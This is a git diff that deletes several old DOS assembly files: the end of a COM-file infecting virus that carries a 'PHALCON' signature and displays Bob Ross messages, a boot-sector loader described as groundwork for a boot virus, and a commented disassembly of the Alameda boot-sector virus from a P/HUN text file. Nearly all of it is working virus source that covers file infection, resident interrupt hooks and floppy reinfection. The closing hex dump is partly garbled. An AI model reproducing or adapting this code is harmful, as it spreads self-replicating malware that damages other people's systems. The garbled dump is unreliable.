- jz enuff_for_now ; If so, exit -find_next_file: - mov ah,4Fh ; Find next - int 21h - jc return_to_fcn - -check_if_COM_infected: - mov si, offset DTA + dta_filename + 6 ; look at 7th letter - add si, offset_off - cmp byte ptr [si], 'D' ; ??????D.COM? - jz find_next_file ; don't kill COMMAND.COM - - mov ax,3D00h ; Open channel read ONLY - mov dx, si ; Offset Pathname in DX - sub dx, 6 - int 21h ; Open NOW! - jc find_next_file ; If error, find another - - xchg bx,ax ; bx is now handle - mov ah,3Fh ; Save - mov cx, part1_size ; first part - mov dx, offset buffer ; to buffer - add dx, offset_off ; to be restored - push dx - int 21h ; later - - pop si ; Check for virus ID bytes - ; in the buffer - push si - lodsw ; DS:[SI] -> AX - cmp ax, virus_marker ; Compare it - jnz infect_it ; infect it if ID #1 not found - - lodsw ; Check next two bytes - cmp ax, virus_marker2 ; Compare it - jnz infect_it ; infect if ID #2 not found - pop si -bomb_out: - mov ah, 3Eh ; else close the file - int 21h ; and go find another - jmp find_next_file ; 'cuz it's already infected - -Signature db 'PHALCON' - -;============================================================================= -;D-Good Stuff - Infection routine -;============================================================================= -infect_it: - ; save fileattr - pop si - add si, offset DTA + DTA_fileattr - offset buffer - mov di, si - add di, offset origattr - offset DTA - DTA_fileattr - movsb ; DS:[SI] -> ES:[DI] - movsw ; Save origtime - movsw ; Save origdate - movsw ; Save filesize - ; Only need LSW - ; because COM files - ; can only be up to - ; 65535 bytes long - cmp word ptr [si - 2], part1_size - jl bomb_out ; is less than 8 bytes. - -do_again: - mov ah, 2Ch ; get time - int 21h - add dl, dh ; 1/100 sec + 1 sec - jz do_again ; Don't want orig strain! 
- - mov si, offset encrypt_val - add si, offset_off - mov byte ptr [si], dl ; 255 mutations - - mov ax, 4301h ; Set file attributes - xor cx, cx ; to nothing - mov dx, si ; filename in DTA - add dx, offset DTA + DTA_filename - offset encrypt_val - int 21h ; do it now, my child - - mov ah, 3Eh ; Close file - int 21h ; handle in BX - - mov ax, 3D02h ; Open file read/write - int 21h ; Filename offset in DX - jc bomb_out ; Damn! Probs - - mov di, dx - add di, offset oldhandle - offset DTA - DTA_filename - ; copy filehandle to - ; oldhandle - stosw ; AX -> ES:[DI] - xchg ax, bx ; file handle in BX now - - mov ah, 40h ; Write DS:[DX]->file - mov cx, part1_size - 4 ; number of bytes - mov dx, 0100h ; where code starts - int 21h ; (in memory) - - mov ah, 40h - mov si, di ; mov si, offset filesize - add si, offset filesize - 2 - offset oldhandle - add word ptr [si], 0100h - mov cx, 2 - mov dx, si - int 21h ; write jmp offset - - mov ax, [si] ; AX = filesize - sub ax, 0108h - - add si, offset buffer3 - offset filesize - push si - mov word ptr [si], ax - mov ah, 40h - mov cx, 2 - mov dx, si - int 21h - - mov ax, 4202h ; move file ptr - xor cx, cx ; from EOF - xor dx, dx ; offset cx:dx - int 21h - - call copy_rest_stuff - - pop si - add si, offset oldhandle - offset buffer3 - mov bx, word ptr [si] - mov ax, 5701h ; Restore - add si, offset origtime - offset oldhandle - mov cx, word ptr [si] ; old time and - add si, 2 - mov dx, word ptr [si] ; date - int 21h - - mov ah, 3Eh ; Close file - int 21h - - mov ax, 4301h ; Restore file - xor ch, ch - add si, offset origattr - offset origtime - 2 - mov cl, byte ptr [si] ; attributes - mov dx, si ; filename in DTA - add dx, offset DTA + DTA_filename - offset origattr - int 21h ; do it now - - jmp find_next_file2 - -GotoError: - jmp error - -Psycho: -; Check if already installed - push es - mov byte ptr cs:[100h],0 ; Initialize fingerprint - xor bx, bx ; Zero BX for start - mov ax, cs -Init1: inc bx ; Increment search segment - mov es, 
bx ; value - cmp ax, bx ; Not installed if we reach - je Not_Installed_Yet ; the current segment - mov si, 100h ; Search segment for - mov di, si ; fingerprint in first - mov cx, 4 ; four bytes - repe cmpsb ; Compare - jne init1 ; If not equal, try another - jmp Quit_Init ; else already installed - -Not_Installed_Yet: - pop es - mov word ptr cs:[Counter], init_delay - mov word ptr cs:[D_Mess], 1 - -; Copy interrupt handler to beginning of code - mov si, offset _int_08_handler - add si, offset_off - mov di, Int_08_Start - mov cx, int_end - int_start - rep movsb ; DS:[SI]->ES:[DI] - - mov ax, 3508h ; Get int 8 handler - int 21h ; put in ES:BX - - mov cs:[duh], bx ; Save old handler - mov cs:[duh+2], es ; in cs:[104h] - - mov ax, 2508h ; Install new handler - mov dx, Int_08_Start ; from DS:DX - int 21h ; Do it - - push es - mov ax, ds:[2Ch] ; Deallocate program - mov es, ax ; environment block - mov ah, 49h - int 21h - pop es - - mov ax, 3100h ; TSR - mov dx, (offset int_end - offset int_start + offset part1_end - offset Code + 4 + 15 + 128) SHR 4 - int 21h - int 20h ; In case of error -Quit_Init: - pop es -Error: ; On error, quit -Quit: - mov ah, 3Bh ; Change directory - mov dx, offset root_dir ; to the root dir - add dx, offset_off - int 21h - - mov ah,3Bh ; Change directory - ; Return to orig dir - add dx, offset orig_path - offset root_dir - int 21h - -; Copy buffer back to beginning of file - mov si, dx - add si, offset buffer2 - offset orig_path - mov di, 0100h - mov cx, part1_end - part1_start - rep movsb - - mov di, 0100h - jmp di -int_start: -_int_08_handler proc far - push ax - push bx - push cx - push dx - push si - push ds - push es - pushf - dec word ptr CS:[Counter] ; Counter - jnz QuitNow -;ACTIVATION!!! 
- mov word ptr CS:[Counter], delay ; Reset counter - - ; Set up DS & ES to equal CS - push cs - pop ds - push cs - pop es - - mov si, offset Messages - offset int_start + int_08_start - mov cx, cs:D_Mess - xor ah, ah -LoopY_ThingY: - lodsb ; DS:SI -> AL - add si, ax ; ES:BP -> Next message to display - loop LoopY_ThingY - - lodsb - xchg si, bp - - xor cx, cx - mov cl, al ; Length of string - mov ax, 1300h ; - mov bx, 0070h ; Page 0, inverse video - xor dx, dx ; (0,0) - int 10h ; Display ES:BP - inc word ptr cs:[D_Mess] - cmp word ptr cs:[D_Mess], num_messages - jnz Sigh - mov word ptr cs:[D_Mess], 1 - -Sigh: mov cx, 30h -Sigh2: push cx - mov cx, 0FFFFh -DelayX: loop DelayX - pop cx - loop Sigh2 - xchg si, bp -QuitNow: - popf - pop es - pop ds - pop si - pop dx - pop cx - pop bx - pop ax - jmp dword ptr CS:duh - -Messages db 0 - db 15, 'Bob Ross lives!' - db 21, 'Bob Ross is watching!' - db 22, 'Maybe he lives here...' - db 26, 'What a happy little cloud!' - db 38, 'Maybe he has a neighbour right here...' - db 40, 'You can make up stories as you go along.' -_int_08_handler endp -int_end: -part2_end: - -CODE ends - end part1_start - diff --git a/b/BOOT (27).ASM b/b/BOOT (27).ASM deleted file mode 100755 index 839a0b8..0000000 --- a/b/BOOT (27).ASM +++ /dev/null 
@@ -1,248 +0,0 @@ -;This is a simple boot sector that will load either MS-DOS or PC-DOS. It is not -;self-reproducing, but it will be used as the foundation on which to build a -;virus into a boot sector. - -;This segment is where the first operating system file (IBMBIO.COM or IO.SYS) -;will be loaded and executed from. We don't know (or care) what is there, but -;we do need the address to jump to defined in a separate segment so we can -;execute a far jump to it. -DOS_LOAD SEGMENT AT 0070H - ASSUME CS:DOS_LOAD - - ORG 0 - -LOAD: DB 0 ;Start of the first operating system program - -DOS_LOAD ENDS - - -MAIN SEGMENT BYTE - ASSUME CS:MAIN,DS:MAIN,SS:NOTHING - -;This jump instruction is just here so we can compile this program as a COM -;file. It is never actually executed, and never becomes a part of the boot -;sector. Only the 512 bytes after the address 7C00 in this file become part of -;the boot sector. - ORG 100H - -START: jmp BOOTSEC - -;The following two definitions are BIOS RAM bytes which contain information -;about the number and type of disk drives in the computer. These are needed by -;the virus to decide on where to look to find drives to infect. They are not -;normally needed by an ordinary boot sector. -; -; ORG 0410H -; -;SYSTEM_INFO: DB ? ;System info byte: Take bits 6 & 7 and add 1 to get number of -; ;disk drives on this system (eg 01 = 2 drives) -; -; ORG 0475H -; -;HD_COUNT: DB ? ;Number of hard drives in the system -; -;This area is reserved for loading the first sector of the root directory, when -;checking for the existence of system files and loading the first system file. - - ORG 0500H - -DISK_BUF: DW ? ;Start of the buffer - -;Here is the start of the boot sector code. This is the chunk we will take out -;of the compiled COM file and put it in the first sector on a 360K floppy disk. -;Note that this MUST be loaded onto a 360K floppy to work, because the -;parameters in the data area that follow are set up to work only with a 360K -;disk! 
- - ORG 7C00H - -BOOTSEC: JMP BOOT ;Jump to start of boot sector code - - ORG 7C03H ;This is needed because the jump will get coded as 2 bytes - -DOS_ID: DB 'EZBOOT ' ;Name of this boot sector (8 bytes) -SEC_SIZE: DW 200H ;Size of a sector, in bytes -SECS_PER_CLUST: DB 02 ;Number of sectors in a cluster -FAT_START: DW 1 ;Starting sector for the first File Allocation Table (FAT) -FAT_COUNT: DB 2 ;Number of FATs on this disk -ROOT_ENTRIES: DW 70H ;Number of root directory entries -SEC_COUNT: DW 2D0H ;Total number of sectors on this disk -DISK_ID: DB 0FDH ;Disk type code (This is 360KB) -SECS_PER_FAT: DW 2 ;Number of sectors per FAT -SECS_PER_TRK: DW 9 ;Sectors per track for this drive -HEADS: DW 2 ;Number of heads (sides) on this drive -HIDDEN_SECS: DW 0 ;Number of hidden sectors on the disk - -DSKBASETBL: - DB 0 ;Specify byte 1: step rate time, head unload time - DB 0 ;Specify byte 2: Head load time, DMA mode - DB 0 ;Wait time until motor turned off, in clock ticks - DB 0 ;Bytes per sector (0=128, 1=256, 2=512, 3=1024) - DB 12H ;Last sector number (we make it large enough to handle 1.2/1.44 MB floppies) - DB 0 ;Gap length between sectors for r/w operations, in bytes - DB 0 ;Data transfer length when sector length not specified - DB 0 ;Gap length between sectors for format operations, in bytes - DB 0 ;Value stored in newly formatted sectors - DB 1 ;Head settle time, in milliseconds (we set it small to speed operations) - DB 0 ;Motor startup time, in 1/8 seconds - -HEAD: DB 0 ;Current head to read from (scratch area used by boot sector) - -;Here is the start of the boot sector code - -BOOT: CLI ;interrupts off - XOR AX,AX ;prepare to set up segments - MOV ES,AX ;set ES=0 - MOV SS,AX ;start stack at 0000:7C00 - MOV SP,OFFSET BOOTSEC - MOV BX,1EH*4 ;get address of disk - LDS SI,SS:[BX] ;param table in ds:si - PUSH DS - PUSH SI ;save that address - PUSH SS - PUSH BX ;and its address - - MOV DI,OFFSET DSKBASETBL ;and update default - MOV CX,11 ;values to the table stored 
here - CLD ;direction flag cleared -DFLT1: LODSB - CMP BYTE PTR ES:[DI],0 ;anything non-zero - JNZ SHORT DFLT2 ;is not a default, so don't save it - STOSB ;else put default value in place - JMP SHORT DFLT3 ;and go on to next -DFLT2: INC DI -DFLT3: LOOP DFLT1 ;and loop until cx=0 - - MOV AL,AH ;set ax=0 - MOV DS,AX ;set ds=0 so we can set disk tbl - MOV WORD PTR [BX+2],AX ;to @DSKBASETBL (ax=0 here) - MOV WORD PTR [BX],OFFSET DSKBASETBL ;ok, done - STI ;now turn interrupts on - INT 13H ;and reset disk drive system -ERROR1: JC ERROR1 ;if an error, hang the machine - -;Here we look at the first file on the disk to see if it is the first MS-DOS or -;PC-DOS system file, IO.SYS or IBMBIO.COM, respectively. -LOOK_SYS: - MOV AL,BYTE PTR [FAT_COUNT] ;get fats per disk - XOR AH,AH - MUL WORD PTR [SECS_PER_FAT] ;multiply by sectors per fat - ADD AX,WORD PTR [HIDDEN_SECS] ;add hidden sectors - ADD AX,WORD PTR [FAT_START] ;add starting fat sector - - PUSH AX - MOV WORD PTR [DOS_ID],AX ;root dir, save it - - MOV AX,20H ;dir entry size - MUL WORD PTR [ROOT_ENTRIES] ;dir size in ax - MOV BX,WORD PTR [SEC_SIZE] ;sector size - ADD AX,BX ;add one sector - DEC AX ;decrement by 1 - DIV BX ;ax=# sectors in root dir - ADD WORD PTR [DOS_ID],AX ;DOS_ID=start of data - MOV BX,OFFSET DISK_BUF ;set up disk read buffer at 0000:0500 - POP AX - CALL CONVERT ;and go convert sequential sector number to bios data - MOV AL,1 ;prepare for a disk read for 1 sector - CALL READ_DISK ;go read it - - MOV DI,BX ;compare first file on disk with - MOV CX,11 ;required file name - MOV SI,OFFSET SYSFILE_1 ;of first system file for PC DOS - REPZ CMPSB - JZ SYSTEM_THERE ;ok, found it, go load it - - MOV DI,BX ;compare first file with - MOV CX,11 ;required file name - MOV SI,OFFSET SYSFILE_2 ;of first system file for MS DOS - REPZ CMPSB -ERROR2: JNZ ERROR2 ;not the same - an error, so hang the machine - -;Ok, system file is there, so load it -SYSTEM_THERE: - MOV AX,WORD PTR [DISK_BUF+1CH] ;get file size of 
IBMBIO.COM/IO.SYS - XOR DX,DX - DIV WORD PTR [SEC_SIZE] ;and divide by sector size - INC AL ;ax=number of sectors to read - MOV BP,AX ;store that number in BP - MOV AX,WORD PTR [DOS_ID] ;get sector number of start of data - PUSH AX - MOV BX,700H ;set disk read buffer to 0000:0700 -RD_BOOT1: MOV AX,WORD PTR [DOS_ID] ;and get sector to read - CALL CONVERT ;convert to bios Trk/Cyl/Sec info - MOV AL,1 ;read one sector - CALL READ_DISK ;go read the disk - SUB BP,1 ;subtract 1 from number of sectors to read - JZ DO_BOOT ;and quit if we're done - ADD WORD PTR [DOS_ID],1 ;add sectors read to sector to read - ADD BX,WORD PTR [SEC_SIZE] ;and update buffer address - JMP RD_BOOT1 ;then go for another - - -;Ok, the first system file has been read in, now transfer control to it -DO_BOOT: - MOV CH,BYTE PTR [DISK_ID] ;Put drive type in ch - MOV DL,BYTE PTR [DRIVE] ;Drive number in dl - POP BX - JMP FAR PTR LOAD ;and transfer control to the first system file - - -;Convert sequential sector number in ax to BIOS Track, Head, Sector information. -;Save track number in DX, sector number in CH, -CONVERT: - XOR DX,DX - DIV WORD PTR [SECS_PER_TRK] ;divide ax by sectors per track - INC DL ;dl=sector number to start read on, al=track/head count - MOV CH,DL ;save it here - XOR DX,DX - DIV WORD PTR [HEADS] ;divide ax by head count - MOV BYTE PTR [HEAD],DL ;dl=head number, save it - MOV DX,AX ;ax=track number, save it in dx - RET - - -;Read the disk for the number of sectors in al, into the buffer es:bx, using -;the track number in DX, the head number at HEAD, and the sector -;number at CH. 
-READ_DISK: - MOV AH,2 ;read disk command - MOV CL,6 ;shift possible upper 2 bits of track number to - SHL DH,CL ;the high bits in dh - OR DH,CH ;and put sector number in the low 6 bits - MOV CX,DX - XCHG CH,CL ;ch (0-5) = sector, cl, ch (6-7) = track - MOV DL,BYTE PTR [DRIVE] ;get drive number from here - MOV DH,BYTE PTR [HEAD] ;and head number from here - INT 13H ;go read the disk -ERROR3: JC ERROR3 ;hang in case of an error - RET - -;Move data that doesn't change from this boot sector to the one read in at -;DISK_BUF. That includes everything but the DRIVE ID (at offset 7DFDH) and -;the data area at the beginning of the boot sector. -MOVE_DATA: - MOV SI,OFFSET DSKBASETBL ;Move all of the boot sector code after the data area - MOV DI,OFFSET DISK_BUF + (OFFSET DSKBASETBL - OFFSET BOOTSEC) - MOV CX,OFFSET DRIVE - OFFSET DSKBASETBL - REP MOVSB - MOV SI,OFFSET BOOTSEC ;Move the initial jump and the sector ID - MOV DI,OFFSET DISK_BUF - MOV CX,11 - REP MOVSB - RET - - -SYSFILE_1: DB 'IBMBIO COM' ;PC DOS System file -SYSFILE_2: DB 'IO SYS' ;MS DOS System file - - ORG 7DFDH - -DRIVE: DB 0 ;Drive number, used in disk reads, etc. -BOOT_ID: DW 0AA55H ;Boot sector ID word - - -MAIN ENDS - - - END START - \ No newline at end of file diff --git a/b/BOOTVIR (28).ASM b/b/BOOTVIR (28).ASM deleted file mode 100755 index 67c92bb..0000000 --- a/b/BOOTVIR (28).ASM +++ /dev/null 
@@ -1,431 +0,0 @@ - - P/HUN Issue #4, Volume 2: Phile 3 of 11 - ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - A BOOT SECTOR VIRUS - 5/15/89 - - -The following is a disassembled and commented version of the Alemeda -College Boot infector virus. Courtesy of Southern Cross. - - -;-----------------------------------------------------------------------; -; This virus is of the "FLOPPY ONLY" variety. ; -; It replicates to the boot sector of a floppy disk and when it gains control -; it will move itself to upper memory. It redirects the keyboard ; -; interrupt (INT 09H) to look for ALT-CTRL-DEL sequences at which time ; -; it will attempt to infect any floppy it finds in drive A:. ; -; It keeps the real boot sector at track 39, sector 8, head 0 ; -; It does not map this sector bad in the fat (unlike the Pakistani Brain) -; and should that area be used by a file, the virus ; -; will die. It also contains no anti detection mechanisms as does the ; -; BRAIN virus. It apparently uses head 0, sector 8 and not head 1 ; -; sector 9 because this is common to all floppy formats both single ; -; sided and double sided. It does not contain any malevolent TROJAN ; -; HORSE code. It does appear to contain a count of how many times it ; -; has infected other diskettes although this is harmless and the count ; -; is never accessed. ; -; ; -; Things to note about this virus: ; -; It can not only live through an ALT-CTRL-DEL reboot command, but this ; -; is its primary (only for that matter) means of reproduction to other ; -; floppy diskettes. The only way to remove it from an infected system ; -; is to turn the machine off and reboot an uninfected copy of DOS. ; -; It is even resident when no floppy is booted but BASIC is loaded ; -; instead. Then when ALT-CTRL-DEL is pressed from inside of BASIC, ; -; it activates and infectes the floppy from which the user is ; -; attempting to boot. 
; -; ; -; Also note that because of the POP CS command to pass control to ; -; its self in upper memory, this virus does not to work on 80286 ; -; machines (because this is not a valid 80286 instruction). ; -; ; -; The Norton Utilities can be used to identify infected diskettes by ; -; looking at the boot sector and the DOS SYS utility can be used to ; -; remove it (unlike the Pakistani Brain). ; -;-----------------------------------------------------------------------; - ; - ORG 7C00H ; - ; -TOS LABEL WORD ;TOP OF STACK -;-----------------------------------------------------------------------; -; 1. Find top of memory and copy ourself up there. (keeping same offset); -; 2. Save a copy of the first 32 interrupt vectors to top of memory too ; -; 3. Redirect int 9 (keyboard) to ourself in top of memory ; -; 4. Jump to ourself at top of memory ; -; 5. Load and execute REAL boot sector from track 40, head 0, sector 8 ; -;-----------------------------------------------------------------------; -BEGIN: CLI ;INITIALIZE STACK - XOR AX,AX ; - MOV SS,AX ; - MOV SP,offset TOS ; - STI ; - ; - MOV BX,0040H ;ES = TOP OF MEMORY - (7C00H+512) - MOV DS,BX ; - MOV AX,[0013H] ; - MUL BX ; - SUB AX,07E0H ; (7C00H+512)/16 - MOV ES,AX ; - ; - PUSH CS ;DS = CS - POP DS ; - ; - CMP DI,3456H ;IF THE VIRUS IS REBOOTING... - JNE B_10 ; - DEC Word Ptr [COUNTER_1] ;...LOW&HI:COUNTER_1-- - ; -B_10: MOV SI,SP ;SP=7C00 ;COPY SELF TO TOP OF MEMORY - MOV DI,SI ; - MOV CX,512 ; - CLD ; - REP MOVSB ; - ; - MOV SI,CX ;CX=0 ;SAVE FIRST 32 INT VETOR ADDRESSES TO - MOV DI,offset BEGIN - 128 ; 128 BYTES BELOW OUR HI CODE - MOV CX,128 ; - REP MOVSB ; - ; - CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) - ; - PUSH ES ;ES=HI ;JUMP TO OUR HI CODE WITH - POP CS ; CS = ES - ; - PUSH DS ;DS=0 ;ES = DS - POP ES ; - ; - MOV BX,SP ;SP=7C00 ;LOAD REAL BOOT SECTOR TO 0000:7C00 - MOV DX,CX ;CX=0 ; DRIVE A: HEAD 0 - MOV CX,2708H ; TRACK 40, SECTOR 8 - MOV AX,0201H ; READ SECTOR - INT 13H ; (common to 8/9 sect. 
1/2 sided!) - JB $ ; HANG IF ERROR - ; - JMP JMP_BOOT ;JMP 0000:7C00 - ; -;-----------------------------------------------------------------------; -; SAVE THEN REDIRECT INT 9 VECTOR ; -; ; -; ON ENTRY: DS = 0 ; -; ES = WHERE TO SAVE OLD_09 & (HI) ; -; WHERE NEW_09 IS (HI) ; -;-----------------------------------------------------------------------; -PUT_NEW_09: ; - DEC Word Ptr [0413H] ;TOP OF MEMORY (0040:0013) -= 1024 - ; - MOV SI,9*4 ;COPY INT 9 VECTOR TO - MOV DI,offset OLD_09 ; OLD_09 (IN OUR HI CODE!) - MOV CX,0004 ; - ; - CLI ; - REP MOVSB ; - MOV Word Ptr [9*4],offset NEW_09 - MOV [(9*4)+2],ES ; - STI ; - ; - RET ; - ; -;-----------------------------------------------------------------------; -; RESET KEYBOARD, TO ACKNOWLEDGE LAST CHAR ; -;-----------------------------------------------------------------------; -ACK_KEYBD: ; - IN AL,61H ;RESET KEYBOARD THEN CONTINUE - MOV AH,AL ; - OR AL,80H ; - OUT 61H,AL ; - XCHG AL,AH ; - OUT 61H,AL ; - JMP RBOOT ; - ; -;-----------------------------------------------------------------------; -; DATA AREA WHICH IS NOT USED IN THIS VERSION ; -; REASON UNKNOWN ; -;-----------------------------------------------------------------------; -TABLE DB 27H,0,1,2 ;FORMAT INFORMATION FOR TRACK 39 - DB 27H,0,2,2 ; (CURRENTLY NOT USED) - DB 27H,0,3,2 ; - DB 27H,0,4,2 ; - DB 27H,0,5,2 ; - DB 27H,0,6,2 ; - DB 27H,0,7,2 ; - DB 27H,0,8,2 ; - ; -;A7C9A LABEL BYTE ; - DW 00024H ;NOT USED - DB 0ADH ; - DB 07CH ; - DB 0A3H ; - DW 00026H ; - ; -;L7CA1: ; - POP CX ;NOT USED - POP DI ; - POP SI ; - POP ES ; - POP DS ; - POP AX ; - POPF ; - JMP 1111:1111 ; - ; -;-----------------------------------------------------------------------; -; IF ALT & CTRL & DEL THEN ... ; -; IF ALT & CTRL & ? THEN ... 
; -;-----------------------------------------------------------------------; -NEW_09: PUSHF ; - STI ; - ; - PUSH AX ; - PUSH BX ; - PUSH DS ; - ; - PUSH CS ;DS=CS - POP DS ; - ; - MOV BX,[ALT_CTRL] ;BX=SCAN CODE LAST TIME - IN AL,60H ;GET SCAN CODE - MOV AH,AL ;SAVE IN AH - AND AX,887FH ;STRIP 8th BIT IN AL, KEEP 8th BIT AH - ; - CMP AL,1DH ;IS IT A [CTRL]... - JNE N09_10 ;...JUMP IF NO - MOV BL,AH ;(BL=08 ON KEY DOWN, BL=88 ON KEY UP) - JMP N09_30 ; - ; -N09_10: CMP AL,38H ;IS IT AN [ALT]... - JNE N09_20 ;...JUMP IF NO - MOV BH,AH ;(BH=08 ON KEY DOWN, BH=88 ON KEY UP) - JMP N09_30 ; - ; -N09_20: CMP BX,0808H ;IF (CTRL DOWN & ALT DOWN)... - JNE N09_30 ;...JUMP IF NO - ; - CMP AL,17H ;IF [I]... - JE N09_X0 ;...JUMP IF YES - CMP AL,53H ;IF [DEL]... - JE ACK_KEYBD ;...JUMP IF YES - ; -N09_30: MOV [ALT_CTRL],BX ;SAVE SCAN CODE FOR NEXT TIME - ; -N09_90: POP DS ; - POP BX ; - POP AX ; - POPF ; - ; - DB 0EAH ;JMP F000:E987 -OLD_09 DW ? ; - DW 0F000H ; - ; -N09_X0: JMP N09_X1 ; - ; -;-----------------------------------------------------------------------; -; ; -;-----------------------------------------------------------------------; -RBOOT: MOV DX,03D8H ;DISABLE COLOR VIDEO !?!? - MOV AX,0800H ;AL=0, AH=DELAY ARG - OUT DX,AL ; - CALL DELAY ; - MOV [ALT_CTRL],AX ;AX=0 ; - ; - MOV AL,3 ;AH=0 ;SELECT 80x25 COLOR - INT 10H ; - MOV AH,2 ;SET CURSOR POS 0,0 - XOR DX,DX ; - MOV BH,DH ; PAGE 0 - INT 10H ; - ; - MOV AH,1 ;SET CURSOR TYPE - MOV CX,0607H ; - INT 10H ; - ; - MOV AX,0420H ;DELAY (AL=20H FOR EOI BELOW) - CALL DELAY ; - ; - CLI ; - OUT 20H,AL ;SEND EOI TO INT CONTROLLER - ; - MOV ES,CX ;CX=0 (DELAY) ;RESTORE FIRST 32 INT VECTORS - MOV DI,CX ; (REMOVING OUR INT 09 HANDLER!) 
- MOV SI,offset BEGIN - 128 ; - MOV CX,128 ; - CLD ; - REP MOVSB ; - ; - MOV DS,CX ;CX=0 ;DS=0 - ; - MOV Word Ptr [19H*4],offset NEW_19 ;SET INT 19 VECTOR - MOV [(19H*4)+2],CS ; - ; - MOV AX,0040H ;DS = ROM DATA AREA - MOV DS,AX ; - ; - MOV [0017H],AH ;AH=0 ;KBFLAG (SHIFT STATES) = 0 - INC Word Ptr [0013H] ;MEMORY SIZE += 1024 (WERE NOT ACTIVE) - ; - PUSH DS ;IF BIOS F000:E502 == 21E4... - MOV AX,0F000H ; - MOV DS,AX ; - CMP Word Ptr [0E502H],21E4H ; - POP DS ; - JE R_90 ; - INT 19H ; IF NOT...REBOOT - ; -R_90: JMP 0F000:0E502H ;...DO IT ?!?!?! - ; -;-----------------------------------------------------------------------; -; REBOOT INT VECTOR ; -;-----------------------------------------------------------------------; -NEW_19: XOR AX,AX ; - ; - MOV DS,AX ;DS=0 - MOV AX,[0410] ;AX=EQUIP FLAG - TEST AL,1 ;IF FLOPPY DRIVES ... - JNZ N19_20 ;...JUMP -N19_10: PUSH CS ;ELSE ES=CS - POP ES ; - CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) - INT 18H ;LOAD BASIC - ; -N19_20: MOV CX,0004 ;RETRY COUNT = 4 - ; -N19_22: PUSH CX ; - MOV AH,00 ;RESET DISK - INT 13 ; - JB N19_81 ; - MOV AX,0201 ;READ BOOT SECTOR - PUSH DS ; - POP ES ; - MOV BX,offset BEGIN ; - MOV CX,1 ;TRACK 0, SECTOR 1 - INT 13H ; -N19_81: POP CX ; - JNB N19_90 ; - LOOP N19_22 ; - JMP N19_10 ;IF RETRY EXPIRED...LOAD BASIC - ; -;-----------------------------------------------------------------------; -; Reinfection segment. ; -;-----------------------------------------------------------------------; -N19_90: CMP DI,3456 ;IF NOT FLAG SET... - JNZ RE_INFECT ;...RE INFECT - ; -JMP_BOOT: ;PASS CONTROL TO BOOT SECTOR - JMP 0000:7C00H ; - ; -;-----------------------------------------------------------------------; -; Reinfection Segment. ; -;-----------------------------------------------------------------------; -RE_INFECT: ; - MOV SI,offset BEGIN ;COMPARE BOOT SECTOR JUST LOADED WITH - MOV CX,00E6H ; OURSELF - MOV DI,SI ; - PUSH CS ; - POP ES ; - CLD ; - REPE CMPSB ; - JE RI_12 ;IF NOT EQUAL... 
- ; - INC Word Ptr ES:[COUNTER_1] ;INC. COUNTER IN OUR CODE (NOT DS!) - ; -;MAKE SURE TRACK 39, HEAD 0 FORMATTED ; - MOV BX,offset TABLE ;FORMAT INFO - MOV DX,0000 ;DRIVE A: HEAD 0 - MOV CH,40-1 ;TRACK 39 - MOV AH,5 ;FORMAT - JMP RI_10 ;REMOVE THE FORMAT OPTION FOR NOW ! - ; -; <<< NO EXECUTION PATH TO HERE >>> ; - JB RI_80 ; - ; -;WRITE REAL BOOT SECTOR AT TRACK 39, SECTOR 8, HEAD 0 -RI_10: MOV ES,DX ;ES:BX = 0000:7C00, HEAD=0 - MOV BX,offset BEGIN ;TRACK 40H - MOV CL,8 ;SECTOR 8 - MOV AX,0301H ;WRITE 1 SECTOR - INT 13H ; - ; - PUSH CS ; (ES=CS FOR PUT_NEW_09 BELOW) - POP ES ; - JB RI_80 ;IF WRITE ERROR...JUMP TO BOOT CODE - ; - MOV CX,0001 ;WRITE INFECTED BOOT SECTOR ! - MOV AX,0301 ; - INT 13H ; - JB RI_80 ; IF ERROR...JUMP TO BOOT CODE - ; -RI_12: MOV DI,3456H ;SET "JUST INFECTED ANOTHER ONE"... - INT 19H ;...FLAG AND REBOOT - ; -RI_80: CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) - DEC Word Ptr ES:[COUNTER_1] ; (DEC. CAUSE DIDNT INFECT) - JMP JMP_BOOT ; - ; -;-----------------------------------------------------------------------; -; ; -;-----------------------------------------------------------------------; -N09_X1: MOV [ALT_CTRL],BX ;SAVE ALT & CTRL STATUS - ; - MOV AX,[COUNTER_1] ;PUT COUNTER_1 INTO RESET FLAG - MOV BX,0040H ; - MOV DS,BX ; - MOV [0072H],AX ; 0040:0072 = RESET FLAG - JMP N09_90 ; - ; -;-----------------------------------------------------------------------; -; DELAY ; -; ; -; ON ENTRY AH:CX = LOOP COUNT ; -;-----------------------------------------------------------------------; -DELAY: SUB CX,CX ; -D_01: LOOP $ ; - SUB AH,1 ; - JNZ D_01 ; - RET ; - ; -;-----------------------------------------------------------------------; -; ; -;-----------------------------------------------------------------------; -A7DF4 DB 27H,00H,8,2 - -COUNTER_1 DW 001CH -ALT_CTRL DW 0 - -A7DFC DB 27H,0,8,2 - -END -;-----------------------------------------------------------------------; -; Hexadecimal representation. 
; -;-----------------------------------------------------------------------; -;7C00 FA 31 C0 8E D0 BC 00 7C-FB BB 40 00 8E DB A1 13 z1@.P<.|{;@..[!. -;7C10 00 F7 E3 2D E0 07 8E C0-0E 1F 81 FF 56 34 75 04 .wc-`..@....V4u. -;7C20 FF 0E F8 7D 89 E6 89 F7-B9 00 02 FC F3 A4 89 CE ..x}.f.w9..|s$.N -;7C30 BF 80 7B B9 80 00 F3 A4-E8 15 00 06 0F 1E 07 89 ?.{9..s$h....... -;7C40 E3 89 CA B9 08 27 B8 01-02 CD 13 72 FE E9 38 01 c.J9.'8..M.r~i8. -;7C50 FF 0E 13 04 BE 24 00 BF-E6 7C B9 04 00 FA F3 A4 ....>$.?f|9..zs$ -;7C60 C7 06 24 00 AD 7C 8C 06-26 00 FB C3 E4 61 88 C4 G.$.-|..&.{Cda.D -;7C70 0C 80 E6 61 86 C4 E6 61-EB 73 27 00 01 02 27 00 ..fa.Dfaks'...'. -;7C80 02 02 27 00 03 02 27 00-04 02 27 00 05 02 27 00 ..'...'...'...'. -;7C90 06 02 27 00 07 02 27 00-08 02 24 00 AD 7C A3 26 ..'...'.$.-|#& -;7CA0 09 5F 5E 07 1F 58 9D-EA 11 11 1 FB .Y_^..X.j.....{P -;7CB0 53 1E 0E 1F 8B 1E FA 7D-E4 60 88 C4 25 7F 88 S.....z}d`.D%..< -;7CC0 1D 75 04 88 E3 EB 16 3C-38 75 04 88 E7 EB 0E .u..ck.<8u..gk.. 